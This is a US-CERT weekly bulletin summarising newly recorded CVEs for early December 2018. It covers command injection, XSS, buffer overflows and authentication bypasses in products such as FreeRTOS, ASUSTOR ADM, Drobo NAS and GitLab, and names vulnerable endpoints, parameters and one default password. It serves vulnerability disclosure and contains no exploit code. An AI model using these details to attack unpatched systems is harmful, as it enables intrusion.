
SB18-344: Vulnerability Summary for the Week of December 3, 2018


Original release date: December 10, 2018

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities corresponds to the following scores:

  • High – Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 – 10.0

  • Medium – Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 – 6.9

  • Low – Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 – 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.

The NCCIC Weekly Vulnerability Summary Bulletin is created using information from the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD). In some cases, the vulnerabilities in the Bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.


High Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
There were no high vulnerabilities recorded this week.


Medium Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
metinfo — metinfo | Metinfo 6.1.3 has reflected XSS via the admin/column/move.php lang_columnerr4 parameter. | 2018-12-03 | 4.3 | CVE-2018-19835 (MISC)


Low Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
There were no low vulnerabilities recorded this week.


Severity Not Yet Assigned

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
actiontec — c1000a_router | Persistent Cross-Site Scripting (XSS) in the advancedsetup_websiteblocking.html Website Blocking page of the Actiontec C1000A router with firmware through CAC004-31.30L.95 allows a remote attacker to inject arbitrary HTML into the Website Blocking page by inserting arbitrary HTML into the ‘TodUrlAdd’ URL parameter in a /urlfilter.cmd POST request. | 2018-12-06 | not yet calculated | CVE-2018-19922 (MISC)
amazon_web_services — freertos | Amazon Web Services (AWS) FreeRTOS through 1.3.1, FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), and WITTENSTEIN WHIS Connect middleware TCP/IP component allow information disclosure during parsing of ICMP packets in prvProcessICMPPacket. | 2018-12-06 | not yet calculated | CVE-2018-16527 (MISC, MISC, CONFIRM)
amazon_web_services — freertos | Amazon Web Services (AWS) FreeRTOS through 1.3.1 allows remote attackers to execute arbitrary code because of mbedTLS context object corruption in prvSetupConnection and GGD_SecureConnect_Connect in AWS TLS connectivity modules. | 2018-12-06 | not yet calculated | CVE-2018-16528 (MISC, MISC, CONFIRM)
amazon_web_services — freertos | An issue was discovered in Amazon Web Services (AWS) FreeRTOS through 1.3.1, FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), and WITTENSTEIN WHIS Connect middleware TCP/IP component. Out of bounds memory access during parsing of DHCP responses in prvProcessDHCPReplies can be used for information disclosure. | 2018-12-06 | not yet calculated | CVE-2018-16602 (MISC, MISC, CONFIRM)
amazon_web_services — freertos | An issue was discovered in Amazon Web Services (AWS) FreeRTOS through 1.3.1, FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), and WITTENSTEIN WHIS Connect middleware TCP/IP component. A crafted IP header triggers a full memory space copy in prvProcessIPPacket, leading to denial of service and possibly remote code execution. | 2018-12-06 | not yet calculated | CVE-2018-16601 (MISC, MISC, CONFIRM)
amazon_web_services — freertos | An issue was discovered in Amazon Web Services (AWS) FreeRTOS through 1.3.1, FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), and WITTENSTEIN WHIS Connect middleware TCP/IP component. Out of bounds memory access during parsing of ARP packets in eARPProcessPacket can be used for information disclosure. | 2018-12-06 | not yet calculated | CVE-2018-16600 (MISC, MISC, CONFIRM)
amazon_web_services — freertos | An issue was discovered in Amazon Web Services (AWS) FreeRTOS through 1.3.1, FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), and WITTENSTEIN WHIS Connect middleware TCP/IP component. In xProcessReceivedUDPPacket and prvParseDNSReply, any received DNS response is accepted, without confirming it matches a sent DNS request. | 2018-12-06 | not yet calculated | CVE-2018-16598 (MISC, MISC, CONFIRM)
amazon_web_services — freertos | An issue was discovered in Amazon Web Services (AWS) FreeRTOS through 1.3.1, FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), and WITTENSTEIN WHIS Connect middleware TCP/IP component. Out of bounds memory access during parsing of NBNS packets in prvTreatNBNS can be used for information disclosure. | 2018-12-06 | not yet calculated | CVE-2018-16599 (MISC, MISC, CONFIRM)
amazon_web_services — freertos | Amazon Web Services (AWS) FreeRTOS through 1.3.1, FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), and WITTENSTEIN WHIS Connect middleware TCP/IP component allow remote attackers to leak information or execute arbitrary code because of a Buffer Overflow during generation of a protocol checksum in usGenerateProtocolChecksum and prvProcessIPPacket. | 2018-12-06 | not yet calculated | CVE-2018-16526 (MISC, MISC, CONFIRM)
amazon_web_services — freertos | Amazon Web Services (AWS) FreeRTOS through 1.3.1 has an uninitialized pointer free in SOCKETS_SetSockOpt. | 2018-12-06 | not yet calculated | CVE-2018-16522 (MISC, MISC, CONFIRM)
amazon_web_services — freertos | An issue was discovered in Amazon Web Services (AWS) FreeRTOS through 1.3.1, FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), and WITTENSTEIN WHIS Connect middleware TCP/IP component. Out of bounds access to TCP source and destination port fields in xProcessReceivedTCPPacket can leak data back to an attacker. | 2018-12-06 | not yet calculated | CVE-2018-16603 (MISC, MISC, CONFIRM)
amazon_web_services — freertos | Amazon Web Services (AWS) FreeRTOS through 1.3.1, FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), and WITTENSTEIN WHIS Connect middleware TCP/IP component allow remote attackers to execute arbitrary code or leak information because of a Buffer Overflow during parsing of DNSLLMNR packets in prvParseDNSReply. | 2018-12-06 | not yet calculated | CVE-2018-16525 (MISC, MISC, CONFIRM)
amazon_web_services — freertos | Amazon Web Services (AWS) FreeRTOS through 1.3.1, FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), and WITTENSTEIN WHIS Connect middleware TCP/IP component allow information disclosure during parsing of TCP options in prvCheckOptions. | 2018-12-06 | not yet calculated | CVE-2018-16524 (MISC, MISC, CONFIRM)
amazon_web_services — freertos | Amazon Web Services (AWS) FreeRTOS through 1.3.1, FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), and WITTENSTEIN WHIS Connect middleware TCP/IP component allow division by zero in prvCheckOptions. | 2018-12-06 | not yet calculated | CVE-2018-16523 (MISC, MISC, CONFIRM)
anker — nebula_capsule_pro_nbui_m1_devices | Anker Nebula Capsule Pro NBUI_M1_V2.1.9 devices allow attackers to cause a denial of service (reboot of the underlying Android 7.1.2 operating system) via a crafted application that sends data to WifiService. | 2018-12-08 | not yet calculated | CVE-2018-19980 (MISC)
antiy_labs — avl_atool | Local attackers can trigger a stack-based buffer overflow on vulnerable installations of Antiy-AVL ATool security management v1.0.0.22. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the processing of IOCTL 0x80002000 by the IRPFile.sys Antiy-AVL ATool kernel driver. The bug is caused by failure to properly validate the length of the user-supplied data, which results in a kernel stack buffer overflow. An attacker can leverage this vulnerability to execute arbitrary code in the context of the kernel, which could lead to privilege escalation and a failed exploit could lead to denial of service. | 2018-12-05 | not yet calculated | CVE-2018-19650 (MISC)
arm — mbed_tls | Arm Mbed TLS before 2.14.1, before 2.7.8, and before 2.1.17 allows a local unprivileged attacker to recover the plaintext of RSA decryption, which is used in RSA-without-(EC)DH(E) cipher suites. | 2018-12-05 | not yet calculated | CVE-2018-19608 (MISC, CONFIRM, CONFIRM)
artifex — mupdf | In Artifex MuPDF 1.14.0, svg/svg-run.c allows remote attackers to cause a denial of service (recursive calls followed by a fitz/xml.c fz_xml_att crash from excessive stack consumption) via a crafted svg file, as demonstrated by mupdf-gl. | 2018-12-05 | not yet calculated | CVE-2018-19881 (MISC, MISC)
artifex — mupdf | In Artifex MuPDF 1.14.0, the svg_run_image function in svg/svg-run.c allows remote attackers to cause a denial of service (href_att NULL pointer dereference and application crash) via a crafted svg file, as demonstrated by mupdf-gl. | 2018-12-05 | not yet calculated | CVE-2018-19882 (MISC, MISC)
aruba — access_points | A vulnerability exists in the firmware of embedded BLE radios that are part of some Aruba Access points. An attacker who is able to exploit the vulnerability could install new, potentially malicious firmware into the AP’s BLE radio and could then gain access to the AP’s console port. This vulnerability is applicable only if the BLE radio has been enabled in affected access points. The BLE radio is disabled by default. Note – Aruba products are NOT affected by a similar vulnerability being tracked as CVE-2018-16986. | 2018-12-07 | not yet calculated | CVE-2018-7080 (BID, CONFIRM)
aruba — clearpass | A Remote Authentication bypass in Aruba ClearPass Policy Manager leads to complete cluster compromise. An authentication flaw in all versions of ClearPass could allow an attacker to compromise the entire cluster through a specially crafted API call. Network access to the administrative web interface is required to exploit this vulnerability. Resolution: Fixed in 6.7.6 and 6.6.10-hotfix. | 2018-12-07 | not yet calculated | CVE-2018-7067 (CONFIRM)
aruba — clearpass | Aruba ClearPass Policy Manager guest authorization failure. Certain administrative operations in ClearPass Guest do not properly enforce authorization rules, which allows any authenticated administrative user to execute those operations regardless of privilege level. This could allow low-privilege users to view, modify, or delete guest users. Resolution: Fixed in 6.7.6 and 6.6.10-hotfix. | 2018-12-07 | not yet calculated | CVE-2018-7079 (CONFIRM)
aruba — clearpass | An unauthenticated remote command execution exists in Aruba ClearPass Policy Manager on linked devices. The ClearPass OnConnect feature permits administrators to link other network devices into ClearPass for the purpose of collecting enhanced information about connected endpoints. A defect in the API could allow a remote attacker to execute arbitrary commands on one of the linked devices. This vulnerability is only applicable if credentials for devices have been supplied to ClearPass under Configuration -> Network -> Devices -> CLI Settings. Resolution: Fixed in 6.7.5 and 6.6.10-hotfix. | 2018-12-07 | not yet calculated | CVE-2018-7066 (CONFIRM)
aruba — clearpass | An authenticated SQL injection vulnerability in Aruba ClearPass Policy Manager can lead to privilege escalation. All versions of ClearPass are affected by multiple authenticated SQL injection vulnerabilities. In each case, an authenticated administrative user of any type could exploit this vulnerability to gain access to “appadmin” credentials, leading to complete cluster compromise. Resolution: Fixed in 6.7.6 and 6.6.10-hotfix. | 2018-12-07 | not yet calculated | CVE-2018-7065 (CONFIRM)
aruba — clearpass | In Aruba ClearPass, disabled API admins can still perform read/write operations. In certain circumstances, API admins in ClearPass which have been disabled may still be able to perform read/write operations on parts of the XML API. This can lead to unauthorized access to the API and complete compromise of the ClearPass instance if an attacker knows of the existence of these accounts. | 2018-12-07 | not yet calculated | CVE-2018-7063 (CONFIRM)
asustor — adm | Directory Traversal in downloadwallpaper.cgi in ASUSTOR ADM version 3.1.1 allows attackers to download arbitrary files by manipulating the “file” and “folder” URL parameters. | 2018-12-04 | not yet calculated | CVE-2018-12314 (MISC)
asustor — adm | Missing verification of a password in ASUSTOR ADM version 3.1.1 allows attackers to change account passwords without entering the current password. | 2018-12-04 | not yet calculated | CVE-2018-12315 (MISC)
asustor — adm | Denial-of-service in the login page of ASUSTOR ADM 3.1.1 allows attackers to prevent users from signing in by placing malformed text in the title. | 2018-12-04 | not yet calculated | CVE-2018-12319 (MISC)
asustor — adm | OS command injection in user.cgi in ASUSTOR ADM version 3.1.1 allows attackers to execute system commands as root via the “secret_key” URL parameter. | 2018-12-04 | not yet calculated | CVE-2018-12312 (MISC)
asustor — adm | Information disclosure in the SNMP settings page in ASUSTOR ADM version 3.1.1 allows attackers to obtain the SNMP password in cleartext. | 2018-12-04 | not yet calculated | CVE-2018-12318 (MISC)
asustor — adm | OS command injection in group.cgi in ASUSTOR ADM version 3.1.1 allows attackers to execute system commands as root by modifying the “name” POST parameter. | 2018-12-04 | not yet calculated | CVE-2018-12317 (MISC)
asustor — adm | OS Command Injection in upload.cgi in ASUSTOR ADM version 3.1.1 allows attackers to execute system commands by modifying the filename POST parameter. | 2018-12-04 | not yet calculated | CVE-2018-12316 (MISC)
asustor — adm | Cross-site scripting in File Explorer in ASUSTOR ADM version 3.1.1 allows attackers to execute JavaScript by uploading SVG images with embedded JavaScript. | 2018-12-04 | not yet calculated | CVE-2018-12305 (MISC)
asustor — adm | OS command injection in user.cgi in ASUSTOR ADM version 3.1.1 allows attackers to execute system commands as root via the “name” POST parameter. | 2018-12-04 | not yet calculated | CVE-2018-12307 (MISC)
asustor — adm | Cross-site scripting vulnerability in File Explorer in ASUSTOR ADM version 3.1.1 allows attackers to execute arbitrary JavaScript when a file is moved via a malicious filename. | 2018-12-04 | not yet calculated | CVE-2018-12311 (MISC)
asustor — adm | Cross-site scripting in the Login page in ASUSTOR ADM version 3.1.1 allows attackers to execute JavaScript via the System Announcement feature. | 2018-12-04 | not yet calculated | CVE-2018-12310 (MISC)
asustor — adm | Directory Traversal in upload.cgi in ASUSTOR ADM version 3.1.1 allows attackers to upload files to arbitrary locations by modifying the “path” URL parameter. NOTE: the “filename” POST parameter is covered by CVE-2018-11345. | 2018-12-04 | not yet calculated | CVE-2018-12309 (MISC)
asustor — adm | Encryption key disclosure in share.cgi in ASUSTOR ADM version 3.1.1 allows attackers to obtain the encryption key via the “encrypt_key” URL parameter. | 2018-12-04 | not yet calculated | CVE-2018-12308 (MISC)
asustor — adm | Directory Traversal in File Explorer in ASUSTOR ADM version 3.1.1 allows attackers to view arbitrary files by modifying the “file1” URL parameter, a similar issue to CVE-2018-11344. | 2018-12-04 | not yet calculated | CVE-2018-12306 (MISC)
asustor — adm | OS command injection in snmp.cgi in ASUSTOR ADM version 3.1.1 allows attackers to execute system commands without authentication via the “rocommunity” URL parameter. | 2018-12-04 | not yet calculated | CVE-2018-12313 (MISC)
bastian_allgeier — kirby | panel/login in Kirby v2.5.12 allows XSS via a blog name. | 2018-12-04 | not yet calculated | CVE-2018-16628 (MISC)
brocade_communications — fabric_os | A vulnerability in the proxy service of Brocade Fabric OS versions before 8.2.1, 8.1.2f, 8.0.2f, 7.4.2d could allow remote unauthenticated attackers to obtain sensitive information and possibly cause a denial of service attack. | 2018-12-03 | not yet calculated | CVE-2018-6440 (CONFIRM)
brocade_communications — fabric_os | A vulnerability in the configdownload command of Brocade Fabric OS command line interface (CLI) versions before 8.2.1, 8.1.2f, 8.0.2f, 7.4.2d could allow a local attacker to escape the restricted shell and gain root access. | 2018-12-03 | not yet calculated | CVE-2018-6439 (CONFIRM)
cairo — cairo | cairo 1.16.0, in cairo_ft_apply_variations() in cairo-ft-font.c, would free memory using a free function incompatible with WebKit’s fastMalloc, leading to an application crash with a “free(): invalid pointer” error. | 2018-12-05 | not yet calculated | CVE-2018-19876 (MISC, MISC)
chipsbank_technologies — ump_tool | ChipsBank UMPTool saves the password to the NAND with a simple substitution cipher, which allows attackers to get full access when having physical access to the device. | 2018-12-03 | not yet calculated | CVE-2018-19795 (MISC)
cisco — energy_management_suite | A vulnerability in the configuration of a local database installed as part of the Cisco Energy Management Suite (CEMS) could allow an authenticated, local attacker to access and alter confidential data. The vulnerability is due to the installation of the PostgreSQL database with unchanged default access credentials. An attacker could exploit this vulnerability by logging in to the machine where CEMS is installed and establishing a local connection to the database. The fix for this vulnerability randomizes the database access password in new installations; however, the fix will not change the password for existing installations. Users are required to manually change the password, as documented in the Workarounds section of this advisory. There are workarounds that address this vulnerability. | 2018-12-04 | not yet calculated | CVE-2018-0468 (BID, CISCO, MISC)
cloud_foundry — cloud_foundry_nfs | Cloud Foundry NFS volume release, 1.2.x prior to 1.2.5, 1.5.x prior to 1.5.4, 1.7.x prior to 1.7.3, logs the cf admin username and password when running the nfsbrokerpush BOSH deploy errand. A remote authenticated user with access to BOSH can obtain the admin credentials for the Cloud Foundry Platform through the logs of the NFS volume deploy errand. | 2018-12-05 | not yet calculated | CVE-2018-15797 (CONFIRM)
crafter_software — crafter_cms | A Server-Side Template Injection issue was discovered in Crafter CMS 3.0.18. Attackers with developer privileges may execute OS commands by Creating/Editing a template file (.ftl filetype) that triggers a call to freemarker.template.utility.Execute in the FreeMarker library during rendering of a web page. | 2018-12-06 | not yet calculated | CVE-2018-19907 (MISC, MISC)
dell — encryption | Dell Encryption (formerly Dell Data Protection | Encryption) v10.1.0 and earlier contain an information disclosure vulnerability. A malicious user with physical access to the machine could potentially exploit this vulnerability to access the unencrypted RegBack folder that contains back-ups of sensitive system files. | 2018-12-05 | not yet calculated | CVE-2018-15773 (MISC)
domainmod — domainmod | DomainMOD through 4.11.01 has XSS via the assets/add/registrar-accounts.php UserName, Reseller ID, or notes field. | 2018-12-06 | not yet calculated | CVE-2018-19913 (MISC)
domainmod — domainmod | DomainMOD through 4.11.01 has XSS via the assets/add/dns.php Profile Name or notes field. | 2018-12-06 | not yet calculated | CVE-2018-19914 (MISC)
domainmod — domainmod | DomainMOD through 4.11.01 has XSS via the assets/edit/host.php Web Host Name or Web Host URL field. | 2018-12-06 | not yet calculated | CVE-2018-19915 (MISC)
domainmod — domainmod | DomainMOD through 4.11.01 has XSS via the admin/dw/add-server.php DisplayName, HostName, or UserName field. | 2018-12-05 | not yet calculated | CVE-2018-19892 (MISC)
drobo — 5n2_nas | Incorrect access control in the /mysql/api/diags.php endpoint in Drobo 5N2 NAS version 4.0.5-13.28.96115 allows unauthenticated attackers to retrieve diagnostic information via the “name” URL parameter. | 2018-12-03 | not yet calculated | CVE-2018-14695 (MISC)
drobo — 5n2_nas | Incorrect access control in the /mysql/api/drobo.php endpoint in Drobo 5N2 NAS version 4.0.5-13.28.96115 allows unauthenticated attackers to retrieve sensitive system information. | 2018-12-03 | not yet calculated | CVE-2018-14696 (MISC)
drobo — 5n2_nas | Cross-site scripting in the /DroboAccess/enable_user endpoint in Drobo 5N2 NAS version 4.0.5-13.28.96115 allows attackers to execute JavaScript via the username URL parameter. | 2018-12-03 | not yet calculated | CVE-2018-14697 (MISC)
drobo — 5n2_nas | Cross-site scripting in the /DroboAccess/delete_user endpoint in Drobo 5N2 NAS version 4.0.5-13.28.96115 allows attackers to execute JavaScript via the “username” URL parameter. | 2018-12-03 | not yet calculated | CVE-2018-14698 (MISC)
drobo — 5n2_nas | System command injection in the /DroboAccess/enable_user endpoint in Drobo 5N2 NAS version 4.0.5-13.28.96115 allows unauthenticated attackers to execute system commands via the “username” URL parameter. | 2018-12-03 | not yet calculated | CVE-2018-14699 (MISC)
drobo — 5n2_nas | Incorrect access control in the /mysql/api/droboapp/data endpoint in Drobo 5N2 NAS version 4.0.5-13.28.96115 allows unauthenticated attackers to retrieve the MySQL database root password. | 2018-12-03 | not yet calculated | CVE-2018-14703 (MISC)
drobo — 5n2_nas | System command injection in the /DroboAccess/delete_user endpoint in Drobo 5N2 NAS version 4.0.5-13.28.96115 allows unauthenticated attackers to execute system commands via the “username” URL parameter. | 2018-12-03 | not yet calculated | CVE-2018-14701 (MISC)
drobo — 5n2_nas | Incorrect access control in the /drobopix/api/drobo.php endpoint in Drobo 5N2 NAS version 4.0.5-13.28.96115 allows unauthenticated attackers to retrieve sensitive system information. | 2018-12-03 | not yet calculated | CVE-2018-14702 (MISC)
drobo — 5n2_nas | Incorrect access control in the Dashboard API on Drobo 5N2 NAS version 4.0.5-13.28.96115 allows attackers to bypass authentication due to insecure token generation. | 2018-12-03 | not yet calculated | CVE-2018-14709 (MISC)
drobo — 5n2_nas | An insecure transport protocol used by Drobo Dashboard API on Drobo 5N2 NAS version 4.0.5-13.28.96115 allows attackers to intercept network traffic. | 2018-12-03 | not yet calculated | CVE-2018-14708 (MISC)
drobo — 5n2_nas | Directory traversal in the Drobo Pix web application on Drobo 5N2 NAS version 4.0.5-13.28.96115 allows unauthenticated attackers to upload files to arbitrary locations. | 2018-12-03 | not yet calculated | CVE-2018-14707 (MISC)
drobo — 5n2_nas | System command injection in the /DroboPix/api/drobopix/demo endpoint on Drobo 5N2 NAS version 4.0.5-13.28.96115 allows unauthenticated attackers to execute system commands via the payload in a POST request. | 2018-12-03 | not yet calculated | CVE-2018-14706 (MISC)
drobo — 5n2_nas | Incorrect access control in the /mysql/api/logfile.php endpoint in Drobo 5N2 NAS version 4.0.5-13.28.96115 allows unauthenticated attackers to retrieve MySQL log files via the “name” URL parameter. | 2018-12-03 | not yet calculated | CVE-2018-14700 (MISC)
drobo — 5n2_nas | Cross-site scripting in the MySQL API error page in Drobo 5N2 NAS version 4.0.5-13.28.96115 allows attackers to execute JavaScript via a malformed URL path. | 2018-12-03 | not yet calculated | CVE-2018-14704 (MISC)
f5 — big-ip | The svpn component of the F5 BIG-IP APM client prior to version 7.1.7.2 for Linux and macOS runs as a privileged process and can allow an unprivileged user to get ownership of files owned by root on the local client host in a race condition. | 2018-12-06 | not yet calculated | CVE-2018-15332 (BID, CONFIRM)
foreman — foreman | A cross-site scripting (XSS) flaw was found in the foreman component of satellite. An attacker with privilege to create entries using the Hosts, Monitor, Infrastructure, or Administer Menus is able to execute XSS attacks against other users, possibly leading to malicious code execution and extraction of the anti-CSRF token of higher privileged users. Foreman before 1.18.3, 1.19.1, and 1.20.0 are vulnerable. | 2018-12-07 | not yet calculated | CVE-2018-16861 (CONFIRM)
freebsd — freebsd | In FreeBSD before 11.2-STABLE(r340854) and 11.2-RELEASE-p5, an integer overflow error when handling opcodes can cause memory corruption by sending a specially crafted NFSv4 request. Unprivileged remote users with access to the NFS server may be able to execute arbitrary code. | 2018-12-04 | not yet calculated | CVE-2018-17157 (SECTRACK, MISC, FREEBSD)
freebsd — freebsd | In FreeBSD before 11.2-STABLE(r340854) and 11.2-RELEASE-p5, an integer overflow error can occur when handling the client address length field in an NFSv4 request. Unprivileged remote users with access to the NFS server can crash the system by sending a specially crafted NFSv4 request. | 2018-12-04 | not yet calculated | CVE-2018-17158 (SECTRACK, MISC, FREEBSD)
freebsd — freebsd | In FreeBSD before 11.2-STABLE(r340854) and 11.2-RELEASE-p5, the NFS server lacks a bounds check in the READDIRPLUS NFS request. Unprivileged remote users with access to the NFS server can cause a resource exhaustion by forcing the server to allocate an arbitrarily large memory allocation. | 2018-12-04 | not yet calculated | CVE-2018-17159 (SECTRACK, MISC, FREEBSD)
freebsd — freebsd | In FreeBSD before 11.2-STABLE(r341486) and 11.2-RELEASE-p6, insufficient bounds checking in one of the device models provided by bhyve can permit a guest operating system to overwrite memory in the bhyve host possibly permitting arbitrary code execution. A guest OS using a firmware image can cause the bhyve process to crash, or possibly execute arbitrary code on the host as root. | 2018-12-04 | not yet calculated | CVE-2018-17160 (FREEBSD)
freeswitch — freeswitch | FreeSWITCH through 1.8.2, when mod_xml_rpc is enabled, allows remote attackers to execute arbitrary commands via the api/system or txtapi/system (or api/bg_system or txtapi/bg_system) query string on TCP port 8080, as demonstrated by an api/system?calc URI. This can also be exploited via CSRF. Alternatively, the default password of “works” for the freeswitch account can sometimes be used. | 2018-12-06 | not yet calculated | CVE-2018-19911 (MISC, MISC)
freeware_advanced_audio_coder — freeware_advanced_audio_coder | An invalid memory address dereference was discovered in the huffcode function (libfaac/huff2.c) in Freeware Advanced Audio Coder (FAAC) 1.29.9.2. The vulnerability causes a segmentation fault and application crash, which leads to denial of service in the book 4 case. | 2018-12-05 | not yet calculated | CVE-2018-19887 (MISC)
freeware_advanced_audio_coder — freeware_advanced_audio_coder | An invalid memory address dereference was discovered in the huffcode function (libfaac/huff2.c) in Freeware Advanced Audio Coder (FAAC) 1.29.9.2. The vulnerability causes a segmentation fault and application crash, which leads to denial of service in the book 10 case. | 2018-12-05 | not yet calculated | CVE-2018-19891 (MISC)
freeware_advanced_audio_coder — freeware_advanced_audio_coder | An invalid memory address dereference was discovered in the huffcode function (libfaac/huff2.c) in Freeware Advanced Audio Coder (FAAC) 1.29.9.2. The vulnerability causes a segmentation fault and application crash, which leads to denial of service in the book 2 case. | 2018-12-05 | not yet calculated | CVE-2018-19890 (MISC)
freeware_advanced_audio_coder — freeware_advanced_audio_coder | An invalid memory address dereference was discovered in the huffcode function (libfaac/huff2.c) in Freeware Advanced Audio Coder (FAAC) 1.29.9.2. The vulnerability causes a segmentation fault and application crash, which leads to denial of service in the HCB_ESC case. | 2018-12-05 | not yet calculated | CVE-2018-19888 (MISC)
freeware_advanced_audio_coder — freeware_advanced_audio_coder | An invalid memory address dereference was discovered in the huffcode function (libfaac/huff2.c) in Freeware Advanced Audio Coder (FAAC) 1.29.9.2. The vulnerability causes a segmentation fault and application crash, which leads to denial of service in the book 6 case. | 2018-12-05 | not yet calculated | CVE-2018-19889 (MISC)
freeware_advanced_audio_coder — freeware_advanced_audio_coder | An invalid memory address dereference was discovered in the huffcode function (libfaac/huff2.c) in Freeware Advanced Audio Coder (FAAC) 1.29.9.2. The vulnerability causes a segmentation fault and application crash, which leads to denial of service in the book 8 case. | 2018-12-05 | not yet calculated | CVE-2018-19886 (MISC)
general_electric — proficy_cimplicity_gds | XXE in GE Proficy Cimplicity GDS versions 9.0 R2, 9.5, 10.0. | 2018-12-07 | not yet calculated | CVE-2018-15362 (BID, MISC)
gitlab — community_and_enterprise_edition | An issue was discovered in GitLab Community Edition 11.x before 11.1.8, 11.2.x before 11.2.5, and 11.3.x before 11.3.2. There is Information Exposure via Epic change descriptions. | 2018-12-04 | not yet calculated | CVE-2018-17976 (CONFIRM, CONFIRM)
gitlab — community_and_enterprise_edition | An issue was discovered in GitLab Community and Enterprise Edition before 11.2.7, 11.3.x before 11.3.8, and 11.4.x before 11.4.3. It has Cleartext Storage of Sensitive Information. | 2018-12-04 | not yet calculated | CVE-2018-18641 (CONFIRM, CONFIRM)
gitlab — community_and_enterprise_edition | An issue was discovered in GitLab Community and Enterprise Edition before 11.2.7, 11.3.x before 11.3.8, and 11.4.x before 11.4.3. It has XSS. | 2018-12-04 | not yet calculated | CVE-2018-18642 (CONFIRM, CONFIRM)
gitlab — community_and_enterprise_edition | An issue was discovered in GitLab Community and Enterprise Edition before 11.2.7, 11.3.x before 11.3.8, and 11.4.x before 11.4.3. It has Information Exposure Through an Error Message. | 2018-12-04 | not yet calculated | CVE-2018-18648 (CONFIRM, CONFIRM)
gitlab — community_and_enterprise_edition | An issue was discovered in GitLab Community and Enterprise Edition 11.x before 11.2.7, 11.3.x before 11.3.8, and 11.4.x before 11.4.3. It allows Information Exposure via a Gitlab Prometheus integration. | 2018-12-04 | not yet calculated | CVE-2018-18644 (CONFIRM, CONFIRM)
gitlab — community_and_enterprise_edition | An issue was discovered in GitLab Community and Enterprise Edition before 11.2.7, 11.3.x before 11.3.8, and 11.4.x before 11.4.3. It allows SSRF. | 2018-12-04 | not yet calculated | CVE-2018-18646 (CONFIRM, CONFIRM)
gitlab — community_and_enterprise_edition | An issue was discovered in GitLab Community Edition 11.x before 11.1.8, 11.2.x before 11.2.5, and 11.3.x before 11.3.2. There is Information Exposure via the GFM markdown API. | 2018-12-04 | not yet calculated | CVE-2018-17975 (CONFIRM, CONFIRM)
gitlab — community_and_enterprise_edition | An issue was discovered in GitLab Community and Enterprise Edition before 11.2.7, 11.3.x before 11.3.8, and 11.4.x before 11.4.3. It has Missing Authorization. | 2018-12-04 | not yet calculated | CVE-2018-18647 (CONFIRM, CONFIRM)
gitlab — community_and_enterprise_edition | An issue was discovered in GitLab Community and Enterprise Edition 11.1.x before 11.1.8, 11.2.x before 11.2.5, and 11.3.x before 11.3.2. There is Information Exposure via the merge request JSON endpoint. | 2018-12-04 | not yet calculated | CVE-2018-17939 (CONFIRM, CONFIRM)
gitlab — community_and_enterprise_edition | An issue was discovered in GitLab Community and Enterprise Edition before 11.2.7, 11.3.x before 11.3.8, and 11.4.x before 11.4.3. It has Information Exposure Through Browser Caching. | 2018-12-04 | not yet calculated | CVE-2018-18640 (CONFIRM, CONFIRM)
gitlab — community_and_enterprise_edition | An issue was discovered in GitLab Community and Enterprise Edition before 11.2.7, 11.3.x before 11.3.8, and 11.4.x before 11.4.3. It allows for Information Exposure via unsubscribe links in email replies. | 2018-12-04 | not yet calculated | CVE-2018-18645 (CONFIRM, CONFIRM)
gitlab — enterprise_edition | The Kubernetes integration in GitLab Enterprise Edition 11.x before 11.2.8, 11.3.x before 11.3.9, and 11.4.x before 11.4.4 has SSRF. | 2018-12-04 | not yet calculated | CVE-2018-18843 (CONFIRM, CONFIRM)
gnu — binutils An issue was discovered in the Binary File Descriptor (BFD) library (aka libbfd), as distributed in GNU Binutils through 2.31. There is an integer overflow and infinite loop caused by the IS_CONTAINED_BY_LMA macro in elf.c. 2018-12-07 not yet calculated CVE-2018-19932
MISC
MISC
gnu — binutils An issue was discovered in the Binary File Descriptor (BFD) library (aka libbfd), as distributed in GNU Binutils through 2.31. There is a heap-based buffer overflow in bfd_elf32_swap_phdr_in in elfcode.h because the number of program headers is not restricted. 2018-12-07 not yet calculated CVE-2018-19931
MISC
MISC
gnu — c_library In the GNU C Library (aka glibc or libc6) through 2.28, attempting to resolve a crafted hostname via getaddrinfo() leads to the allocation of a socket descriptor that is not closed. This is related to the if_nametoindex() function. 2018-12-04 not yet calculated CVE-2018-19591
BID
SECTRACK
FEDORA
FEDORA
CONFIRM
CONFIRM
CONFIRM
google — android In lppTransposer of lpp_tran.cpp there is a possible out of bounds write due to missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-112160868. 2018-12-06 not yet calculated CVE-2018-9549
BID
CONFIRM
